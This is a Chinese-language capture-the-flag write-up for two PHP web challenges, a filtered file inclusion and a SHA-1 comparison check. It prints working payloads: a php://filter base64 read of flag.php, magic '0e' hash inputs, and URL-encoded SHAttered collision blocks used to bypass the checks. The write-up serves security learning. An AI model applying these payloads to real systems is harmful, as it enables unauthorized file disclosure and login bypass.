签到杯Web Write Up

Created2022-10-23Updated2023-04-25Visited

1.ezinclude:how to include it? 

1
2
3
4
5
6
7
8
9
10
11
12
 <?php
    highlight_file(__FILE__);
    error_reporting(0);

    $file=$_GET['file'];
    if(strstr($file,"data")||stristr($file, "input")||stristr($file,"tp")||stristr($file,"../")){
        echo "Oh no!";
        exit();
    }
    include($file); 
//flag放在了flag.php里
?>

由GET[file]可知这里需要以get的形式提交file: ?file=
注意到include(file),得知这是一个文件包含,此时便想使用php://协议来读取该php文件的源码;此时便想到了php协议中的php://filter,php://filter访问的是输出流,read为filter的参数,用于读取数据;convert.base64-encode此时将读取的数据进行base64编码,使得php代码可以在页面中显现出来;resource,指向要读取的文件。
此处strstr()与stristr()函数会判断一个字串会不会在原字符串中,会的话则会返回字串及其剩余部分;又因为if语句中有返回则为ture,所以当有返回值时便会输出Oh no;综上可知此时过滤了date input tp ../;
构造payload:http://www.susuxinyuyu.com/index.php?file=php://filter/read/convert.base64-encode/resource=flag.php

1
2
3
4
5
6
7
8
9
10
11
12
 <?php
    highlight_file(__FILE__);
    error_reporting(0);

    $file=$_GET['file'];
    if(strstr($file,"data")||stristr($file, "input")||stristr($file,"tp")||stristr($file,"../")){
        echo "Oh no!";
        exit();
    }
    include($file); 
//flag放在了flag.php里
?> PD9waHANCiRmbGFnMiA9ICdmbGFne1JjM19yQ0VfZmw0Z18xc19oM3JlIX0nOw0KPz4=

此时对其进行base64解码便可解出flag
php://filter 的参数列表:read读取write写入 resource数据来源(必须的)
read参数值可为:tring.strip_tags 将数据流中的所有html标签清除
string.toupper将数据流中的内容转换为大写
string.tolower将数据流中的内容转换为小写
convert.base64-encode 将数据流中内容转换为base64编码
convert.base64-decode 与上面对应解码

2: hash_hash:md5 is easy, but hash?

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
 <?php
include('flag.php');
highlight_file(__FILE__);
error_reporting(0);

$temp1 = 0;
$temp2 = 0;

if (isset($_GET['username']) and isset($_POST['password'])) {
    if ($_GET['username'] == $_POST['password']){
        print 'Your password can not be your username.';
    }
    else if (sha1($_GET['username']) == sha1($_POST['password'])){
        $temp1 = 1;
    }
}

if (isset($_GET['newuser']) and isset($_POST['newpasswd'])) {
    if ($_GET['newuser'] == $_POST['newpasswd']){
        print 'Your newpasswd can not be your newuser.';
    }
    else if (sha1($_GET['newuser']) === sha1($_POST['newpasswd'])){
        $temp2 = 1;
    }
}

if (is_array($_GET['username']) or is_array($_GET['newuser'])){
    die('nonono');
}

if ($temp1 && $temp2) {
    echo $flag1;
}

哈希算法:对输入的值进行加密然后输出;常见的是MD5和SHA-1;
由题意可知我们需要使用get的方式提交username和newuser;使用post的方式提交password和newpasswd;
绕过方法一:
==:弱比较:只比较值不比较类型;此时可以使用0e绕过弱比较;
0e加密:对于某些特殊的字符串经过加密之后得到的值以0e开头,此时PHP中会以科学计数法进行处理,结果为0的n次方,此时他们的值都相等;此时便可以绕过弱比较
SHA-1:

1
2
3
4
5
6
10932435112: 0e07766915004133176347055865026311692244
aaroZmOk: 0e66507019969427134894567494305185566735
aaK1STfY: 0e76658526655756207688271159624026011393
aaO8zKZF: 0e89257456677279068558073954252716165668
aa3OFF9m: 0e36977786278517984959260394024281014729
0e1290633704: 0e19985187802402577070739524195726831799

===:强比较类型:不止比较值也比比较类型,先比较类型在比较值
SHA-1:

1
2
a=%25PDF-1.3%0A%25%E2%E3%CF%D3%0A%0A%0A1%200%20obj%0A%3C%3C/Width%202%200%20R/Height%203%200%20R/Type%204%200%20R/Subtype%205%200%20R/Filter%206%200%20R/ColorSpace%207%200%20R/Length%208%200%20R/BitsPerComponent%208%3E%3E%0Astream%0A%FF%D8%FF%FE%00%24SHA-1%20is%20dead%21%21%21%21%21%85/%EC%09%239u%9C9%B1%A1%C6%3CL%97%E1%FF%FE%01%7FF%DC%93%A6%B6%7E%01%3B%02%9A%AA%1D%B2V%0BE%CAg%D6%88%C7%F8K%8CLy%1F%E0%2B%3D%F6%14%F8m%B1i%09%01%C5kE%C1S%0A%FE%DF%B7%608%E9rr/%E7%ADr%8F%0EI%04%E0F%C20W%0F%E9%D4%13%98%AB%E1.%F5%BC%94%2B%E35B%A4%80-%98%B5%D7%0F%2A3.%C3%7F%AC5%14%E7M%DC%0F%2C%C1%A8t%CD%0Cx0Z%21Vda0%97%89%60k%D0%BF%3F%98%CD%A8%04F%29%A1
b=%25PDF-1.3%0A%25%E2%E3%CF%D3%0A%0A%0A1%200%20obj%0A%3C%3C/Width%202%200%20R/Height%203%200%20R/Type%204%200%20R/Subtype%205%200%20R/Filter%206%200%20R/ColorSpace%207%200%20R/Length%208%200%20R/BitsPerComponent%208%3E%3E%0Astream%0A%FF%D8%FF%FE%00%24SHA-1%20is%20dead%21%21%21%21%21%85/%EC%09%239u%9C9%B1%A1%C6%3CL%97%E1%FF%FE%01sF%DC%91f%B6%7E%11%8F%02%9A%B6%21%B2V%0F%F9%CAg%CC%A8%C7%F8%5B%A8Ly%03%0C%2B%3D%E2%18%F8m%B3%A9%09%01%D5%DFE%C1O%26%FE%DF%B3%DC8%E9j%C2/%E7%BDr%8F%0EE%BC%E0F%D2%3CW%0F%EB%14%13%98%BBU.%F5%A0%A8%2B%E31%FE%A4%807%B8%B5%D7%1F%0E3.%DF%93%AC5%00%EBM%DC%0D%EC%C1%A8dy%0Cx%2Cv%21V%60%DD0%97%91%D0k%D0%AF%3F%98%CD%A4%BCF%29%B1

绕过方法二:
可以使用数组绕过,因为在SHA-1和MD5中无法识别数组,所以返回值为NULL
使用方法:

1
?a[]=1&?b[]=2

因此题过滤了数组,所以无法使用此方法绕过。

因为:if ($temp1 && $temp2) 
{
echo $flag1;
}
可知两个条件都需成立
所以使用Hackbar以get的方式提交

1
username=aaroZmOk&newuser=%25PDF-1.3%0A%25%E2%E3%CF%D3%0A%0A%0A1%200%20obj%0A%3C%3C/Width%202%200%20R/Height%203%200%20R/Type%204%200%20R/Subtype%205%200%20R/Filter%206%200%20R/ColorSpace%207%200%20R/Length%208%200%20R/BitsPerComponent%208%3E%3E%0Astream%0A%FF%D8%FF%FE%00%24SHA-1%20is%20dead%21%21%21%21%21%85/%EC%09%239u%9C9%B1%A1%C6%3CL%97%E1%FF%FE%01%7FF%DC%93%A6%B6%7E%01%3B%02%9A%AA%1D%B2V%0BE%CAg%D6%88%C7%F8K%8CLy%1F%E0%2B%3D%F6%14%F8m%B1i%09%01%C5kE%C1S%0A%FE%DF%B7%608%E9rr/%E7%ADr%8F%0EI%04%E0F%C20W%0F%E9%D4%13%98%AB%E1.%F5%BC%94%2B%E35B%A4%80-%98%B5%D7%0F%2A3.%C3%7F%AC5%14%E7M%DC%0F%2C%C1%A8t%CD%0Cx0Z%21Vda0%97%89%60k%D0%BF%3F%98%CD%A8%04F%29%A1

以post的方式提交

1
password=aaO8zKZF&newpasswd=%25PDF-1.3%0A%25%E2%E3%CF%D3%0A%0A%0A1%200%20obj%0A%3C%3C/Width%202%200%20R/Height%203%200%20R/Type%204%200%20R/Subtype%205%200%20R/Filter%206%200%20R/ColorSpace%207%200%20R/Length%208%200%20R/BitsPerComponent%208%3E%3E%0Astream%0A%FF%D8%FF%FE%00%24SHA-1%20is%20dead%21%21%21%21%21%85/%EC%09%239u%9C9%B1%A1%C6%3CL%97%E1%FF%FE%01sF%DC%91f%B6%7E%11%8F%02%9A%B6%21%B2V%0F%F9%CAg%CC%A8%C7%F8%5B%A8Ly%03%0C%2B%3D%E2%18%F8m%B3%A9%09%01%D5%DFE%C1O%26%FE%DF%B3%DC8%E9j%C2/%E7%BDr%8F%0EE%BC%E0F%D2%3CW%0F%EB%14%13%98%BBU.%F5%A0%A8%2B%E31%FE%A4%807%B8%B5%D7%1F%0E3.%DF%93%AC5%00%EBM%DC%0D%EC%C1%A8dy%0Cx%2Cv%21V%60%DD0%97%91%D0k%D0%AF%3F%98%CD%A4%BCF%29%B1

然后使用bp进行抓包即可得出flag